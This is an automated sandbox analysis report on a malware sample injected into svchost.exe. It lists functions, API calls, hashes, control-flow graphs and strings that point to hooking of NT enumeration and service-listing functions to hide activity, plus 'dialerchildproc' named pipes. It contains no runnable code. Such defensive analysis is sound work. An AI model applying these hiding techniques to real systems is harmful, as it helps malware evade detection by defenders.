                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 16feaae96375266c24b17968b5a080657b5ae57e6ff703aba3d68dcbcffacad4
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 2F711736358F1486EB15DF22FC5BB9963B4FB88B8AF001561EA4E47A68DF38C444C358
                                                                          Function 00000257E10A328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: aade9cdc764c3959dde9a52c1c94ad6719753b48d41f7c1d1db878778cbbdd05
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: A411F93269CF008AFB6EA761FC0F79E2294B7A4347F4081A5D906496D0EF7CC044C62C
                                                                          Function 00000257E10A1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000257E10A1628: GetProcessHeap.KERNEL32 ref: 00000257E10A1633
                                                                            • Part of subcall function 00000257E10A1628: HeapAlloc.KERNEL32 ref: 00000257E10A1642
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16B2
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16DF
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A16F9
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1719
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1734
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1754
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A176F
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A178F
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17AA
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A17CA
                                                                          • Sleep.KERNEL32 ref: 00000257E10A1AD7
                                                                          • SleepEx.KERNEL32 ref: 00000257E10A1ADD
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17E5
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1805
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1820
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1840
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A185B
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A187B
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1896
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A18A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: d712d7bd41ce4f32cb42d1788969e2e1ab98e8c502d066c5c5fdd1db537eb6f4
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 9F31F871298F4582FF5E9726FE4B3E923A4AB44BC2F0858615E0987695FF34C451C228
                                                                          Function 00000257E107273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 110 257e107273c-257e10727a4 call 257e10729d4 * 4 119 257e10727aa-257e10727ad 110->119 120 257e10729b2 110->120 119->120 121 257e10727b3-257e10727b6 119->121 122 257e10729b4-257e10729d0 120->122 121->120 123 257e10727bc-257e10727bf 121->123 123->120 124 257e10727c5-257e10727e6 123->124 124->120 126 257e10727ec-257e107280c 124->126 127 257e107280e-257e1072836 126->127 128 257e1072838-257e107283f 126->128 127->127 127->128 129 257e1072845-257e1072852 128->129 130 257e10728df-257e10728e6 128->130 129->130 133 257e1072858-257e107286a LoadLibraryA 129->133 131 257e10728ec-257e1072901 130->131 132 257e1072992-257e10729b0 130->132 131->132 134 257e1072907 131->134 132->122 135 257e107286c-257e1072878 133->135 136 257e10728ca-257e10728d2 133->136 140 257e107290d-257e1072921 134->140 137 257e10728c5-257e10728c8 135->137 136->133 138 257e10728d4-257e10728d9 136->138 137->136 141 257e107287a-257e107287d 137->141 138->130 142 257e1072923-257e1072934 140->142 143 257e1072982-257e107298c 140->143 144 257e10728a7-257e10728b7 141->144 145 257e107287f-257e10728a5 141->145 147 257e1072936-257e107293d 142->147 148 257e107293f-257e1072943 142->148 143->132 143->140 151 257e10728ba-257e10728c1 144->151 145->151 152 257e1072970-257e1072980 147->152 149 257e107294d-257e1072951 148->149 150 257e1072945-257e107294b 148->150 153 257e1072963-257e1072967 149->153 154 257e1072953-257e1072961 149->154 150->152 151->137 152->142 152->143 153->152 156 257e1072969-257e107296c 153->156 154->152 156->152
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: e1821c6af69327561f239fb501c7fdcfb84665abf8bb743926d129d5342e2f1a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 4E617572B49B9087DB5AEF14E80B73DB3A2F744BE5F188161DE4903788CA78D852C704

                                                                          Non-executed Functions

                                                                          Function 00000257E10A2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 365 257e10a2b2c-257e10a2ba5 call 257e10c2ce0 368 257e10a2ee0-257e10a2f03 365->368 369 257e10a2bab-257e10a2bb1 365->369 369->368 370 257e10a2bb7-257e10a2bba 369->370 370->368 371 257e10a2bc0-257e10a2bc3 370->371 371->368 372 257e10a2bc9-257e10a2bd9 GetModuleHandleA 371->372 373 257e10a2bed 372->373 374 257e10a2bdb-257e10a2beb call 257e10b6090 372->374 376 257e10a2bf0-257e10a2c0e 373->376 374->376 376->368 379 257e10a2c14-257e10a2c33 StrCmpNIW 376->379 379->368 380 257e10a2c39-257e10a2c3d 379->380 380->368 381 257e10a2c43-257e10a2c4d 380->381 381->368 382 257e10a2c53-257e10a2c5a 381->382 382->368 383 257e10a2c60-257e10a2c73 382->383 384 257e10a2c75-257e10a2c81 383->384 385 257e10a2c83 383->385 386 257e10a2c86-257e10a2c8a 384->386 385->386 387 257e10a2c9a 386->387 388 257e10a2c8c-257e10a2c98 386->388 389 257e10a2c9d-257e10a2ca7 387->389 388->389 390 257e10a2d9d-257e10a2da1 389->390 391 257e10a2cad-257e10a2cb0 389->391 394 257e10a2ed2-257e10a2eda 390->394 395 257e10a2da7-257e10a2daa 390->395 392 257e10a2cc2-257e10a2ccc 391->392 393 257e10a2cb2-257e10a2cbf call 257e10a199c 391->393 397 257e10a2d00-257e10a2d0a 392->397 398 257e10a2cce-257e10a2cdb 392->398 393->392 394->368 394->383 399 257e10a2dbb-257e10a2dc5 395->399 400 257e10a2dac-257e10a2db8 call 257e10a199c 395->400 406 257e10a2d3a-257e10a2d3d 397->406 407 257e10a2d0c-257e10a2d19 397->407 398->397 405 257e10a2cdd-257e10a2cea 398->405 402 257e10a2df5-257e10a2df8 399->402 403 257e10a2dc7-257e10a2dd4 399->403 400->399 412 257e10a2e05-257e10a2e12 lstrlenW 402->412 413 257e10a2dfa-257e10a2e03 call 257e10a1bbc 402->413 403->402 411 257e10a2dd6-257e10a2de3 403->411 414 257e10a2ced-257e10a2cf3 405->414 409 257e10a2d3f-257e10a2d49 call 257e10a1bbc 406->409 410 257e10a2d4b-257e10a2d58 lstrlenW 406->410 407->406 415 257e10a2d1b-257e10a2d28 407->415 409->410 421 257e10a2d93-257e10a2d98 409->421 417 257e10a2d5a-257e10a2d64 410->417 418 257e10a2d7b-257e10a2d8d call 257e10a3844 410->418 419 257e10a2de6-257e10a2dec 411->419 423 257e10a2e35-257e10a2e3f call 257e10a3844 412->423 424 257e10a2e14-257e10a2e1e 412->424 413->412 429 257e10a2e4a-257e10a2e55 413->429 414->421 422 257e10a2cf9-257e10a2cfe 414->422 425 257e10a2d2b-257e10a2d31 415->425 417->418 428 257e10a2d66-257e10a2d79 call 257e10a152c 417->428 418->421 433 257e10a2e42-257e10a2e44 418->433 419->429 430 257e10a2dee-257e10a2df3 419->430 421->433 422->397 422->414 423->433 424->423 434 257e10a2e20-257e10a2e33 call 257e10a152c 424->434 425->421 435 257e10a2d33-257e10a2d38 425->435 428->418 428->421 437 257e10a2e57-257e10a2e5b 429->437 438 257e10a2ecc-257e10a2ed0 429->438 430->402 430->419 433->394 433->429 434->423 434->429 435->406 435->425 442 257e10a2e63-257e10a2e7d call 257e10a85c0 437->442 443 257e10a2e5d-257e10a2e61 437->443 438->394 446 257e10a2e80-257e10a2e83 442->446 443->442 443->446 449 257e10a2e85-257e10a2ea3 call 257e10a85c0 446->449 450 257e10a2ea6-257e10a2ea9 446->450 449->450 450->438 452 257e10a2eab-257e10a2ec9 call 257e10a85c0 450->452 452->438
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: a05134c9a34ff4c1d66afd38e5ef54d71b3b96099cc726008d15654598d14383
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 3BB1D032258F5482EB6EDF25EC4B7A963A5F744B86F0450A6EE0953B95DF34CC80C398
                                                                          Function 00000257E10A7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 219ced55679ac893985f66a80f0dbd7178f5651cf27174fbf386b8ec505e6a56
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 29314A72249F808AEB65DF60F8867EE7360F784745F44802ADA4E57B98EF38C648C714
                                                                          Function 00000257E10AD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 3bbfa850ad8dbd0e4a6fa2243018912ee9c80721fc4e2599e2c74e45bb328308
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 1531AD32258F8086EB69CF25FC467AE73A0F789755F504166EA9D43B98EF38C145CB04
                                                                          Function 00000257E10A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: eced55502f1a75a026b6edf846e6a0891afcc2511a2fde73ec7a25957e053ce4
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 39517C32248F8486EB59CF66F84A75A77A1F389F8AF088524DE5907718DF3CC049C704
                                                                          Function 00000257E10A1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 729b3f40a99a6114c8675349f500bf02ad9969b64215182506dd6b7d13de966c
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 6C319574298F4AE1EA0FEFA5FCABBD46325B75434BF8054A3940902576DF3C8249C768
                                                                          Function 00000257E1076910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 207 257e1076910-257e1076916 208 257e1076918-257e107691b 207->208 209 257e1076951-257e107695b 207->209 210 257e107691d-257e1076920 208->210 211 257e1076945-257e1076984 call 257e1076fc0 208->211 212 257e1076a78-257e1076a8d 209->212 213 257e1076938 __scrt_dllmain_crt_thread_attach 210->213 214 257e1076922-257e1076925 210->214 227 257e107698a-257e107699f call 257e1076e54 211->227 228 257e1076a52 211->228 215 257e1076a9c-257e1076ab6 call 257e1076e54 212->215 216 257e1076a8f 212->216 222 257e107693d-257e1076944 213->222 218 257e1076927-257e1076930 214->218 219 257e1076931-257e1076936 call 257e1076f04 214->219 230 257e1076ab8-257e1076aed call 257e1076f7c call 257e1076e1c call 257e1077318 call 257e1077130 call 257e1077154 call 257e1076fac 215->230 231 257e1076aef-257e1076b20 call 257e1077190 215->231 220 257e1076a91-257e1076a9b 216->220 219->222 239 257e1076a6a-257e1076a77 call 257e1077190 227->239 240 257e10769a5-257e10769b6 call 257e1076ec4 227->240 232 257e1076a54-257e1076a69 228->232 230->220 241 257e1076b22-257e1076b28 231->241 242 257e1076b31-257e1076b37 231->242 239->212 259 257e10769b8-257e10769dc call 257e10772dc call 257e1076e0c call 257e1076e38 call 257e107ac0c 240->259 260 257e1076a07-257e1076a11 call 257e1077130 240->260 241->242 246 257e1076b2a-257e1076b2c 241->246 247 257e1076b7e-257e1076b94 call 257e107268c 242->247 248 257e1076b39-257e1076b43 242->248 253 257e1076c1f-257e1076c2c 246->253 268 257e1076bcc-257e1076bce 247->268 269 257e1076b96-257e1076b98 247->269 254 257e1076b45-257e1076b4d 248->254 255 257e1076b4f-257e1076b5d call 257e1085780 248->255 262 257e1076b63-257e1076b78 call 257e1076910 254->262 255->262 272 257e1076c15-257e1076c1d 255->272 259->260 310 257e10769de-257e10769e5 __scrt_dllmain_after_initialize_c 259->310 260->228 280 257e1076a13-257e1076a1f call 257e1077180 260->280 262->247 262->272 270 257e1076bd5-257e1076bea call 257e1076910 268->270 271 257e1076bd0-257e1076bd3 268->271 269->268 277 257e1076b9a-257e1076bbc call 257e107268c call 257e1076a78 269->277 270->272 289 257e1076bec-257e1076bf6 270->289 271->270 271->272 272->253 277->268 304 257e1076bbe-257e1076bc6 call 257e1085780 277->304 297 257e1076a45-257e1076a50 280->297 298 257e1076a21-257e1076a2b call 257e1077098 280->298 294 257e1076bf8-257e1076bff 289->294 295 257e1076c01-257e1076c11 call 257e1085780 289->295 294->272 295->272 297->232 298->297 309 257e1076a2d-257e1076a3b 298->309 304->268 309->297 310->260 311 257e10769e7-257e1076a04 call 257e107abc8 310->311 311->260
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: c413f792152c6e77bcdec011d4ce604bdbff46f8c7e2d41a41648d6f97dd56db
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7481476178CF0586F65FBB2ABC4F3B922D0E785782F5480A49A2647797DB38C8458B0C
                                                                          Function 00000257E10ACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000257E10ACE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEBC
                                                                          • SetLastError.KERNEL32 ref: 00000257E10ACED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000257E10AECCC,?,?,?,?,00000257E10ABF9F,?,?,?,?,?,00000257E10A7AB0), ref: 00000257E10ACF2C
                                                                            • Part of subcall function 00000257E10AD6CC: HeapAlloc.KERNEL32 ref: 00000257E10AD721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF54
                                                                            • Part of subcall function 00000257E10AD744: HeapFree.KERNEL32 ref: 00000257E10AD75A
                                                                            • Part of subcall function 00000257E10AD744: GetLastError.KERNEL32 ref: 00000257E10AD764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: 44b74c0836ad876a2fac46d0e824247e53a8591ac7bd446e8d08f2f1267c89cf
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 3D4182703CDF4441FAAFA7357E5F3AD22815B447B2F6547A4A936066D6DE38C401872C
                                                                          Function 00000257E10A2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: fd144254930c9193e2e316754b6910d439631fa1b8b54bcb3ad30ea55ac0c1ae
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: DB214F32658F4082FB19CB25F84A75A73A0F789BA6F504255EA6903BA8CF3CC149CF04
                                                                          Function 00000257E10AA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 586 257e10aa544-257e10aa5ac call 257e10ab414 589 257e10aa5b2-257e10aa5b5 586->589 590 257e10aaa13-257e10aaa1b call 257e10ac748 586->590 589->590 591 257e10aa5bb-257e10aa5c1 589->591 593 257e10aa690-257e10aa6a2 591->593 594 257e10aa5c7-257e10aa5cb 591->594 596 257e10aa963-257e10aa967 593->596 597 257e10aa6a8-257e10aa6ac 593->597 594->593 598 257e10aa5d1-257e10aa5dc 594->598 601 257e10aa9a0-257e10aa9aa call 257e10a9634 596->601 602 257e10aa969-257e10aa970 596->602 597->596 599 257e10aa6b2-257e10aa6bd 597->599 598->593 600 257e10aa5e2-257e10aa5e7 598->600 599->596 603 257e10aa6c3-257e10aa6ca 599->603 600->593 604 257e10aa5ed-257e10aa5f7 call 257e10a9634 600->604 601->590 612 257e10aa9ac-257e10aa9cb call 257e10a7940 601->612 602->590 605 257e10aa976-257e10aa99b call 257e10aaa1c 602->605 608 257e10aa6d0-257e10aa707 call 257e10a9a10 603->608 609 257e10aa894-257e10aa8a0 603->609 604->612 620 257e10aa5fd-257e10aa628 call 257e10a9634 * 2 call 257e10a9d24 604->620 605->601 608->609 624 257e10aa70d-257e10aa715 608->624 609->601 613 257e10aa8a6-257e10aa8aa 609->613 617 257e10aa8ba-257e10aa8c2 613->617 618 257e10aa8ac-257e10aa8b8 call 257e10a9ce4 613->618 617->601 623 257e10aa8c8-257e10aa8d5 call 257e10a98b4 617->623 618->617 630 257e10aa8db-257e10aa8e3 618->630 654 257e10aa62a-257e10aa62e 620->654 655 257e10aa648-257e10aa652 call 257e10a9634 620->655 623->601 623->630 628 257e10aa719-257e10aa74b 624->628 632 257e10aa751-257e10aa75c 628->632 633 257e10aa887-257e10aa88e 628->633 635 257e10aa9f6-257e10aaa12 call 257e10a9634 * 2 call 257e10ac6a8 630->635 636 257e10aa8e9-257e10aa8ed 630->636 632->633 637 257e10aa762-257e10aa77b 632->637 633->609 633->628 635->590 639 257e10aa8ef-257e10aa8fe call 257e10a9ce4 636->639 640 257e10aa900 636->640 641 257e10aa781-257e10aa7c6 call 257e10a9cf8 * 2 637->641 642 257e10aa874-257e10aa879 637->642 647 257e10aa903-257e10aa90d call 257e10ab4ac 639->647 640->647 667 257e10aa804-257e10aa80a 641->667 668 257e10aa7c8-257e10aa7ee call 257e10a9cf8 call 257e10aac38 641->668 650 257e10aa884 642->650 647->601 665 257e10aa913-257e10aa961 call 257e10a9944 call 257e10a9b50 647->665 650->633 654->655 659 257e10aa630-257e10aa63b 654->659 655->593 671 257e10aa654-257e10aa674 call 257e10a9634 * 2 call 257e10ab4ac 655->671 659->655 664 257e10aa63d-257e10aa642 659->664 664->590 664->655 665->601 675 257e10aa87b 667->675 676 257e10aa80c-257e10aa810 667->676 686 257e10aa7f0-257e10aa802 668->686 687 257e10aa815-257e10aa872 call 257e10aa470 668->687 692 257e10aa676-257e10aa680 call 257e10ab59c 671->692 693 257e10aa68b 671->693 677 257e10aa880 675->677 676->641 677->650 686->667 686->668 687->677 696 257e10aa9f0-257e10aa9f5 call 257e10ac6a8 692->696 697 257e10aa686-257e10aa9ef call 257e10a92ac call 257e10aaff4 call 257e10a94a0 692->697 693->593 696->635 697->696
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
